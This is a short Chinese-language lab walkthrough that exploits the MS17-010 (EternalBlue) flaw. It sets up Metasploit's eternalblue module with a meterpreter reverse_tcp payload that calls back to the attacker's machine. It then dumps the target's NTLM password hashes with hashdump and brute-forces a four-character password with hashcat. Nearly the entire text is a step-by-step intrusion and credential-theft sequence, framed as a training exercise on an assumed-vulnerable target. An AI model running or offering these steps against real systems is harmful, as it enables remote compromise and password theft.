假设已知靶机存在ms17-010漏洞,在 Metasploit终端分别输入以下命令,利用ms17-010漏洞对靶机进行溢出攻击:
use 3 //使用ms17_010_eternalblue模块
show options //查看该模块需要哪些参数
set rhosts 靶机ip //设置目标ip地址
set lhost 操作机ip // 设置本地ip地址
set payload windows/x64/meterpreter/reverse_tcp //使用payload
set rport 445 //设置目标端口
set target 0 //设置目标操作系统类型(自动识别)
run // 执行
1)输入 hashdump 获取靶机账户密码Hash值
将user的hash值拷贝下来
2)利用Hashcat对user账户的密码Hash值进行暴力破解
(假设已知user账户的密码是由数字、小写字母组成、长度为4的字符串)
退回kali终端,输入
hashcat -a 3 -m 1000 hash值 ?h?h?h?h --force
//说明-a 3表示使用暴力破解模式(不借助字典); -m 1000表示目标使用的Hash算法为NTLMHash (windows 操作系统特有):?h?h?h?h表示密码原文为4个字符长度,且每个字符均为数字或小写字母; --force表示忽略破解过程中的报错。